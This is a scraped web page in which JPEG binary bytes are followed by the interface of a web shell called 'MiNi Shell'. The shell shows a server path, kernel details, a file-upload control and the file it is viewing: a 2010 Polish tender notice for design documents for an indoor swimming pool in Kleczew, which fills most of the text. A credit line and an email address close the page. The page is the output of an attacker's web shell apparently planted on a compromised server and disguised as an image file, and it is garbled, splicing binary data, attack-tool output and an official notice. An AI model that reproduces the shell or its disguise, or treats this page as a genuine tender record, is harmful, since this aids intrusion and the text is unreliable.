JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/115228-N-2010.html

<p class="kh_header"><b>Kleczew: Dokumentacja projektowo techniczna na budowę krytej pływalni w Kleczewie</b><br>
<b>Numer ogłoszenia: 115228 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Gminy i Miasta Kleczew , Plac Kościuszki 5, 62-540 Kleczew, woj. wielkopolskie, tel. 063 2700900, faks 063 2700940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowo techniczna na budowę krytej pływalni w Kleczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Pływalnię  należy zaprojektować jako budynek   trzykondygnacyjny o powierzchni
zabudowy do 2.000 m2 w następującym układzie funkcjonalnym:
   a) Piwnica:
      1. sauna sucha z zapleczem i komunikacją  z hali basenowej 
      2. niezbędne pomieszczenia towarzyszące ( w tym zaplecze socjalno - sanitarne obsługi    
          technicznej)  oraz pomieszczenia techniczne związane z funkcjonowaniem całego obiektu i  
          obsługi niecek basenowych.
  b) Parter:
      1. hala basenowa z częścią:
         - sportową z basenem o wymiarach 25m x 15m o zmiennej głębokości 1,1m - 1,8 m z      
            wyposażeniem zgodnym z przepisami FINA, oświetleniem w ścianach bocznych oraz 
            demontowalnym pomostem podwodnym w dwóch torach ograniczającym głębokość 
            basenu do wielkości umożliwiającej naukę pływania dla małych dzieci
        - rekreacyjna, w której należy przewidzieć nieckę - brodzik dla małych dzieci o powierzchni   
          ok. 30m2   o głębokości 0,4 m  z typową zjeżdżalnią prostą
        - rekreacyjną o pow. do 100 m2 połączoną ze strefą basenu hamownego zjeżdżalni.; część 
           rekreacyjna wyposażona powinna być w parasol wodny, masaż karku szeroki i wąski,  
           gejzer podwodny, oświetlenie podwodne w ścianach bocznych i dennej,
          jacuzzi o średnicy 2,5 - 3 m,
     2. hall z komunikacją, szatnią i sanitariatami ogólno dostępnymi, oraz pomieszczeniem o pow    
         ok. 50 m2 przeznaczonym np. na miejsce zabaw dla dzieci
      3. zaplecze szatniowo - natryskowe z węzłami sanitarnymi, pomieszczeniami dla ratowników i   
          trenerów z  zapleczem sanitarnym oraz magazyn na sprzęt pływacki
   c) Piętro
       1. trybuny dla 100 osób z siedziskami w dwu lub trzech rzędach umieszczonych na różnych  
           poziomach,
       2. kawiarenka z bufetem i zapleczem socjalno magazynowym z dachem prześwietlonym,
       3.  taras widokowy dostępny z kawiarenki,
       4.  niezbędne pomieszczenia biurowe, administracyjne i socjalno sanitarne 

2. Dokumentacja  projektowa  powinna  zawierać:
/1/ Mapy    geodezyjne   do    celów   projektowych  w  skali   1:500  w  zakresie    niezbędnym do 
     prawidłowego  opracowania  dokumentacji  projektowej   wraz  z  mapą  stanu  władania  i 
     wypisami z rejestru gruntów.  Mapę stanu władania i wypisy   z   rejestru  gruntów  należy  
     sporządzić również  dla  działek  bezpośrednio   sąsiadujących   z   terenem   inwestycji,  w  celu 
     ustalenia  stron w  postępowaniu  o  udzielenie  pozwolenia  na  budowę,
/2/ Dokumentację    geotechniczną,    tj.   dokumentację   geologiczno  -  inżynierską    i    
     dokumentację techniczną  badania  podłoża  gruntowego  obejmującą  teren  inwestycji,
/3/ Projekt zagospodarowania terenu,  w tym    projekt    urządzeń    małej   architektury,	
/4/ Projekt budowlany   pełnobranżowy  wymagany  przepisami  Prawa  budowlanego,
/5/ Projekt  technologiczny pływalni    (  w  tym:   technologię    podgrzewania, 
     uzdatniania   i  dezynfekcji  wody ),
/6/ Projekt   wykonawczy   obejmujący   wszystkie   branże   z   opisami   i  rysunkami  niezbędnymi  
       do realizacji  robót,
/7/ Projekt  wyposażenia  wnętrz krytych  basenów  kąpielowych ( w  tym: kolorystyka, oświetlenie ),
     projekt    technologiczny   pomieszczeń   pływalni (  w   tym   pomieszczeń:   socjalnych,    odnowy
     biologicznej,  kawiarni,  ), 
/8/ Projekt  organizacji  i  funkcjonowania  basenów  kąpielowych (  w tym: oznakowanie  
     pomieszczeń, tablice  informacyjne ), 
/9/ Projekt  dróg  i  parkingów,
/10/ Projekt  instalacji  wewnętrznych:
      a)   instalacja  wody  zimnej,
      b)   instalacja  wody  ciepłej  użytkowej,
      c)   kanalizacja  sanitarna,
      d)   kanalizacja  deszczowa,
      e)   instalacja  centralnego  ogrzewania,
       f)   instalacja  kolektorów  słonecznych,
       g)   instalacja  wentylacji  mechanicznej,
       h)   instalacja  elektryczna, zasilania  komputerów oświetleniowa, gniazd  wtykowych  i  połączeń  
              wyrównawczych zasilania  odbiorników  siłowych
       i)  instalacja  odgromowa,
       j)  instalacja  sygnalizacji   p. pożarowej z centralą  sygnalizacji  p. poż.
       k)  instalacja  kontroli  dostępu,
        l)  instalacja  telefoniczna z  centralą  telefoniczną,
        ł)  system  komputerowy z UPS
       m)  instalacja  antywłamaniowa,
        n)  instalacja  nagłośnienia,
       o) instalacja  inspicjencka  ( przyzywowa ),

/11/ Przyłącza  i  sieci  zewnętrzne:
     a)  przyłącze  energetyczne,
     b)  przyłącze  telefoniczne,
     c)  przyłącze  wodociągowe,
     d)  kanalizacja  sanitarna,
     e)  kanalizacja deszczowa - odwodnienie  budynku  i  terenu  wraz  z  parkingami ( należy       
          przewidzieć  wykonanie   sieci   prowadzącej   do istniejącej kanalizacji deszczowej
     f)  oświetlenie  zewnętrzne  terenu,

/12/  Projekt  szaty  roślinnej  na  terenie objętym  opracowaniem,
/13/  Opracowanie      dotyczące      ochrony      przeciwpożarowej    ( w     tym:    drogi     
        ewakuacyjne,  oznakowanie,    wyposażenie    w    urządzenia    gaśnicze,   podświetlenie:   dróg   
        ewakuacyjnych, oznakowania,  urządzeń ),
/14/  Przedmiar  robót ,      
/15/  Kosztorys  inwestorski -  zgodnie  z  Rozporządzeniem Ministra  Infrastruktury   z   dnia    18 
        maja 2004 r.  w   sprawie    określenia   metod   i   podstaw   sporządzania   kosztorysu    
        inwestorskiego, ( Dz. U.  Nr  130,  poz. 1389 )  oraz  koszty  utrzymania  obiektu   i  certyfikat  
         energetyczny,
/16/  Specyfikacja techniczna wykonania  i  odbioru  robót  budowlanych - zgodnie  z 
        Rozporządzeniem Ministra  Infrastruktury  z  dnia  2  września  2004 r.  w  sprawie  
        szczegółowego  zakresu  i  formy dokumentacji   projektowej,  specyfikacji  technicznej   
        wykonania  i  odbioru  robót  budowlanych oraz  programu  funkcjonalno - użytkowego ( Dz. U. 
        Nr  202, poz. 2072  z  późn. zm. ),
/17/  Zbiorcze     zestawienie     kosztów   ( ZZK )    obejmujące    wykaz     wszystkich      
        dodatkowych czynników    cenotwórczych     związanych     z    wykonaniem     inwestycji,    
        takich   jak:  wykaz wszystkich  dodatkowych  usług,  koszty  organizacji  placu  budowy,  koszty   
         energii,  wody, itp.,
/18/ Wykonanie prezentacji  3D ( wizualizacja  multimedialna  w  wersji  cyfrowej ),
/19/ Pełny  zakres  uzgodnień, opinii, pozwoleń, decyzji, itp. dokumentów  wymaganych      
       przepisami szczegółowymi   (  w   tym:  przygotowanie   wniosków,  uzyskanie  
        wypisu i  wyrysu z miejscowego  planu  zagospodarowania przestrzennego; uzyskanie   
        wszelkich decyzji, opinii, uzgodnień zgodnie z obowiązującymi przepisami w zakresie ochrony    
        środowiska / Prawo ochrony środowiska,  Prawo wodne /oraz w tym celu przygotowanie      
       wniosków  i wykonanie niezbędnych opracowań;    
      uzyskanie warunków  przyłączeniowych; uzgodnienia terenowo  -  prawne;  uzgodnienia  
        ZUDP  / Zespół   uzgodnienia   dokumentacji    projektowej /,  uzgodnienia  z Polskim  
        Związkiem Pływackim; złożenie kompletnego  wniosku o pozwolenie na budowę )   oraz   
        uzyskanie decyzji pozwolenia na budowę ( dokonanie wszelkich  uzupełnień i  poprawek  
        niezbędnych   w   trakcie   postępowania  o  udzielenie   pozwolenia  na  budowę )..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające będą mogły zostać udzielone jeżeli:
1)	polegają na  tego samego rodzaju zamówień jak zamówienie podstawowe ,i są zgodne z przedmiotem zamówienia podstawowego
2)	wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego,
3)	zostaną udzielone w terminie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5.000,00 zł ( sł. pięć tysięcy złotych )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku na podstawie oświadczenia, o którym mowa w dziale VIII pkt 3 ppkt 3).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 1 pracy projektowej polegającej na opracowaniu kompletnych projektów budowlano wykonawczych  (wraz z uzgodnieniami i pozwoleniami ) na budowę pływalni o podobnej wielkości i parametrach. 
Zamawiający dokona oceny tego warunku na podstawie dokumentów, o których mowa w dziale VIII pkt 2 ppkt 2).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Niniejszy warunek będzie spełniony jeżeli wykonawca załączy do oferty wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami - załącznik nr 5. Do ww. wykazu należy załączyć kopię dokumentu potwierdzającego posiadanie uprawnień projektantów w poszczególnych branżach potrzebnych do zaprojektowania tego obiektu. Wykonawca zobowiązany jest załączyć kopie ich aktualnych zaświadczeń o wpisie do właściwej izby samorządu zawodowego potwierdzającego ważne ubezpieczenie OC lub oświadczenie wykonawcy, iż ww. osoby posiadają wymagane aktualne uprawnienia ; 
Zamawiający dokona oceny tego warunku na podstawie dokumentów, o których mowa w dziale VIII pkt 2 ppkt 3 i 4).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca:
- wykażą, że posiadają ważne ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej na kwotę nie mniejszą niż 100.000,- PLN
Zamawiający dokona oceny tego warunku na podstawie dokumentów, o których  mowa w dziale VIII pkt 2 ppkt 5).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy (wg załącznika nr 1 do SIWZ)
2)	uproszczony kosztorys ofertowy, który będzie stanowił podstawę do sporządzenia harmonogramów prac i płatności, o których mowa we wzorze umowy ( załącznik nr 5 )
3)	dowód wniesienia wadium
4)	pełnomocnictwo - w przypadku, gdy oferta została podpisana przez  pełnomocnika  lub gdy oferta została złożona przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia  zgodnie z art. 23  ustawy - w załączeniu wzory do wykorzystania takich pełnomocnictw (załącznik nr 6 i 7 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość przedłużenia terminu wykonania przedmiotu umowy określonego w pkt 1 o czas opóźnienia, jeżeli takie opóźnienie  będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach: 
1) wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac projektowych, uzgodnień, opinii czy pozwoleń, których wykonanie bądź uzyskanie wiąże się z potrzebą zmiany terminu wykonania, 
2) siły wyższej 
Możliwa jest zmiana umowy w zakresie kluczowego personelu wykonawcy, za uprzednią zgodą zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze w sytuacji, gdy dotychczasowy kierownik z przyczyn losowych nie może dalej wykonywać powierzonych mu czynności. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kleczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Kleczewie 
Pl. Kościuszki 5
62-540 Kleczew
pok. nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 09:00, miejsce: Urząd Gminy i Miasta w Kleczewie 
Pl. Kościuszki 5
62-540 Kleczew
sekretariat Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com